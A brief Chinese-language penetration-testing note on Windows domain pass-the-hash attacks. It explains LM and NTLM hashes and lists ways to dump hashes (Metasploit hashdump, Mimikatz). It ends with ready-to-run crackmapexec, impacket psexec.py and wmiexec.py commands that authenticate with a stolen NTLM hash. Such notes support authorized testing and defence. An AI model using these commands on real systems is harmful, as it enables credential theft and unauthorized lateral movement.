常见的密码加密
LM HASH
从windows server 2008开始被禁用
NTLM HASH
Windows Server 2003以后的认证方式都为NTLM Hash
域渗透-哈希传递攻击
(Pass The Hash/Key)
首先重要的是获取hash
- 上传msf生成的exe进行上传使得靶机上线然后执行hashdump或者run post/windows/gather/smart_hashdump
- Mimkatz(kali2021的meterpreter下有自带的mimkatz,如果没有的话也可以去github上下载exe进行使用)
拓展思路:
假设windows存在smb用户,那我们可以去尝试使用msf的smb_login模块去枚举用户
然后找一个hash字典去进行爆破,然后如果有匹配的话我们就可以尝试使用exploit/windows/smb/psexec模块去尝试获取当前用户的执行权限
攻击手法: - Crackmapexec工具
crackmapexec smb ip –u 用户 –H 32196B56FFE6F45E294117B91A83BF38 - Impacket工具库下的psexec.py
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 用户名@ip - Impacket:wmiexec.py
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 用户名@ip